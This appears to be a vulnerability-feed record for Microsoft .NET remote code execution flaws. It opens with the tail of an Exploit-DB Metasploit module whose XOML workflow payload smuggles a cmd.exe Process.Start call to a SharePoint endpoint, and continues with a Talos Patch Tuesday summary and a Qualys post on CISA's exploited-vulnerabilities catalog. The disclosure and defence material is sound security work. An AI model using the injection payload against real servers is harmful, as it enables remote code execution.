xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\">\r\n <CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' />\r\n </SequentialWorkflowActivity>\r\n ]]>\r\n </workflowMarkupText>\r\n <rulesText></rulesText>\r\n <configBlob></configBlob>\r\n <flag>2</flag>\r\n </ValidateWorkflowMarkupAndCreateSupportObjects>\r\n </soap:Body>\r\n</soap:Envelope>\r\n EOS\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'data' => xoml_data,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n\r\n unless res&.code == 200\r\n print_error('Non-200 HTTP response received while trying to execute the command')\r\n end\r\n\r\n res\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/48275", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2020-01-17T23:27:08", "description": "[](<http://3.bp.blogspot.com/-bIERk6jqSvs/XKypl8tltSI/AAAAAAAAFxU/d9l6_EW1Czs7DzBngmhg8pjdPfhPAZ3yACK4BGAYYCw/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg>) \n \n \n \n \n \n \n \n \n \n \n_By Jon Munshaw._ \n_ \n_**Updated January 15th: Added an Advanced Custom Detection (ACD) signature for AMP that can be used to detect exploitation of CVE-2020-0601 by **_**spoofing certificates masquerading as a Microsoft ECC Code Signing Certificate Authority.**_ \n \nMicrosoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's [Patch Tuesday](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Jan>) covers 49 vulnerabilities, eight of which are considered critical. \n \nThis month's security update is particularly important for its disclosure of two vulnerabilities related to a core cryptographic component in all versions of Windows. CVE-2020-0601 could allow an attacker to use cryptography to sign a malicious executable, making the file appear as if it was from a trusted source. The victim would have no way of knowing if the file was malicious. Cyber security reporter Brian Krebs [says the vulnerability is so serious](<https://krebsonsecurity.com/2020/01/cryptic-rumblings-ahead-of-first-2020-patch-tuesday/>), Microsoft secretly deployed a patch to branches of the U.S. military prior to today. \n \nJanuary's update is also the last that will provide free updates to Windows 7 and Windows Server 2008/2008 R2. \n \nTalos also released a new set of [SNORT\u24c7 rules](<https://snort.org/advisories/talos-rules-2020-01-14>) that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post [here](<https://blog.snort.org/2020/01/snort-rule-update-for-jan-14-2020.html>). \n \n\n\n### Critical vulnerabilities\n\nMicrosoft disclosed eight critical vulnerabilities this month, all of which we will highlight below. \n \n[CVE-2020-0603](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0603>), [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605>), [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606>) and [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646>) are all remote code execution vulnerabilities in the .NET and ASP.NET core software. All four of these vulnerabilities can be triggered if a user opens a malicious, specially crafted file while using an affected version of .NET or ASP.NET Core. If successful, an attacker could then execute arbitrary code in the context of the current user. These bugs exist in how the software handles objects in memory. \n \n[CVE-2020-0609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609>) and [CVE-2020-0610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610>) are remote code execution vulnerabilities in the Windows Remote Desktop Protocol Gateway Server. An attacker could exploit these bugs by sending a specially crafted request to the victim's system RDP Gateway via RDP. This vulnerability is pre-authentication and does not require any user interaction. \n \n[CVE-2020-0611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0611>) is a remote code execution vulnerability in the Windows Remote Desktop Protocol client. This vulnerability can be triggered if a user visits a malicious, specially crafted server. An attacker would need to trick the user into connecting to this server, either via a malicious file or a man-in-the-middle technique. The attacker could then execute arbitrary code on the victim's machine. \n \n[CVE-2020-0640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0640>) is a memory corruption vulnerability that exists in the way the Internet Explorer web browser handles objects in memory. An attacker could use this bug to corrupt the victim machine, and then gain the ability to execute arbitrary code. A user can trigger this vulnerability by visiting a malicious, attacker-controlled web page in Internet Explorer. \n \n\n\n### Important vulnerabilities\n\nThis release also contains 41 important vulnerabilities, three of which we will highlight below. \n \n[CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) is a spoofing vulnerability in Windows CryptoAPI. The specific component, crypt32.dll, improperly validates Elliptic Curve Cryptography certificates. An attacker could exploit this bug to spoof a code-signing certificate and secretly sign a file, making that file appear as if it is from a trusted source. A malicious actor could also use this vulnerability to conduct man-in-the-middle attacks and decrypt confidential information. \n \n[CVE-2020-0616](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0616>) is a denial-of-service vulnerability in Windows due to the way the operating system handles hard links. An attacker needs to log onto the victim machine to exploit this bug, and then run a specially crafted application that would allow them to overwrite system files. \n \n[CVE-2020-0654](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0654>) is a vulnerability in the OneDrive app for Android devices that could allow an attacker to bypass certain security features. If the user access a link to a file on a OneDrive folder a certain way, they could bypass the passcode or fingerprint requirements for the app. \n \nThe other important vulnerabilities are: \n\n\n * [CVE-2020-0602](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0602>)\n * [CVE-2020-0607](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0607>)\n * [CVE-2020-0608](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0608>)\n * [CVE-2020-0612](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0612>)\n * [CVE-2020-0613](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0613>)\n * [CVE-2020-0614](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0614>)\n * [CVE-2020-0615](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0615>)\n * [CVE-2020-0617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0617>)\n * [CVE-2020-0620](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0620>)\n * [CVE-2020-0621](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0621>)\n * [CVE-2020-0622](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0622>)\n * [CVE-2020-0623](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0623>)\n * [CVE-2020-0624](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0624>)\n * [CVE-2020-0625](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0625>)\n * [CVE-2020-0626](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0626>)\n * [CVE-2020-0627](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0627>)\n * [CVE-2020-0628](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0628>)\n * [CVE-2020-0629](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0629>)\n * [CVE-2020-0630](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0630>)\n * [CVE-2020-0631](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0631>)\n * [CVE-2020-0632](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0632>)\n * [CVE-2020-0633](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0633>)\n * [CVE-2020-0634](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0634>)\n * [CVE-2020-0635](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0635>)\n * [CVE-2020-0636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0636>)\n * [CVE-2020-0637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0637>)\n * [CVE-2020-0638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0638>)\n * [CVE-2020-0639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0639>)\n * [CVE-2020-0641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0641>)\n * [CVE-2020-0642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0642>)\n * [CVE-2020-0643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0643>)\n * [CVE-2020-0644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0644>)\n * [CVE-2020-0647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0647>)\n * [CVE-2020-0650](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0650>)\n * [CVE-2020-0651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0651>)\n * [CVE-2020-0652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0652>)\n * [CVE-2020-0653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0653>)\n * [CVE-2020-0656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0656>)\n\n### Coverage \n\nIn response to these vulnerability disclosures, Talos is releasing a new SNORT\u24c7 rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. \n \nThese rules are: 52593 - 52596, 52604, 52605 \n \n\n\n#### AMP Advanced Custom Detection (ACD) signature\n\n \nWhile there can be multiple ways that an attacker can exploit CVE-2020-0601, AMP can be used to detect spoofed certificates that are masquerading as a Microsoft ECC Certificate Authority by adding an advanced custom detection signature. The process to add this signature can be found in the [AMP documentation](<https://docs.amp.cisco.com/AMP%20for%20Endpoints%20User%20Guide.pdf>) on page 33 in the Outbreak Control section under custom detections. The actual custom signature that needs to be added can be downloaded [here](<https://blogs.cisco.com/cve-2020-0601-2>). \n\n", "cvss3": {}, "published": "2020-01-17T10:14:27", "type": "talosblog", "title": "Microsoft Patch Tuesday \u2014 Jan. 2020: Vulnerability disclosures and Snort coverage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0602", "CVE-2020-0603", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0611", "CVE-2020-0612", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0616", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0621", "CVE-2020-0622", "CVE-2020-0623", "CVE-2020-0624", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0636", "CVE-2020-0637", "CVE-2020-0638", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646", "CVE-2020-0647", "CVE-2020-0650", "CVE-2020-0651", "CVE-2020-0652", "CVE-2020-0653", "CVE-2020-0654", "CVE-2020-0656"], "modified": "2020-01-17T10:14:27", "id": "TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6XqA-qeq9Xs/microsoft-patch-tuesday-jan-2020.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532936
